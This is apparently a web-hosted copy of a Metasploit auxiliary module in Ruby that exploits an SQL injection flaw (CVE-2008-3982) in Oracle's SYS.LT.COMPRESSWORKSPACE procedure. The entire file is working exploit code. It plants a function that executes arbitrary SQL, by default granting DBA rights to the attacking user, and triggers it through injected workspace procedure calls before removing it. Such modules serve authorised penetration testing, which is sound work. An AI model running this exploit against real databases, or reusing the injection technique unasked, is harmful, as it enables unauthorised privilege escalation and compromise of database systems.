Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',

14
        'Description' => %q{

15
          This module exploits an sql injection flaw in the COMPRESSWORKSPACE

16
          procedure of the PL/SQL package SYS.LT. Any user with execute

17
          privilege on the vulnerable package can exploit this vulnerability.

18
        },

19
        'Author' => [ 'CG' ],

20
        'License' => MSF_LICENSE,

21
        'References' => [

22
          [ 'CVE', '2008-3982'],

23
          [ 'OSVDB', '49324'],

24
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]

25
        ],

26
        'DisclosureDate' => '2008-10-13',

27
        'Notes' => {

28
          'Stability' => [CRASH_SAFE],

29
          'SideEffects' => [IOC_IN_LOGS],

30
          'Reliability' => []

31
        }

32
      )

33
    )

34


35
    register_options(

36
      [

37
        OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),

38
      ]

39
    )

40
  end

41


42
  def run

43
    return if !check_dependencies

44


45
    name = Rex::Text.rand_text_alpha_upper(1..10)

46
    cruft = Rex::Text.rand_text_alpha_upper(1)

47


48
    function = "

49
      CREATE OR REPLACE FUNCTION #{cruft}

50
      RETURN VARCHAR2 AUTHID CURRENT_USER

51
      AS

52
      PRAGMA AUTONOMOUS_TRANSACTION;

53
      BEGIN

54
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

55
      COMMIT;

56
      RETURN '#{cruft}';

57
      END;"

58


59
    package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

60


61
    package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

62


63
    clean = "DROP FUNCTION #{cruft}"

64


65
    print_status('Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...')

66


67
    print_status('Sending function...')

68
    prepare_exec(function)

69


70
    begin

71
      prepare_exec(package1)

72
      prepare_exec(package2)

73
    rescue StandardError => e

74
      if (e.to_s =~ /No Data/)

75
        print_status("Removing function '#{cruft}'...")

76
        prepare_exec(clean)

77
      else

78
        return

79
      end

80
    end

81
  end

82
end

83


84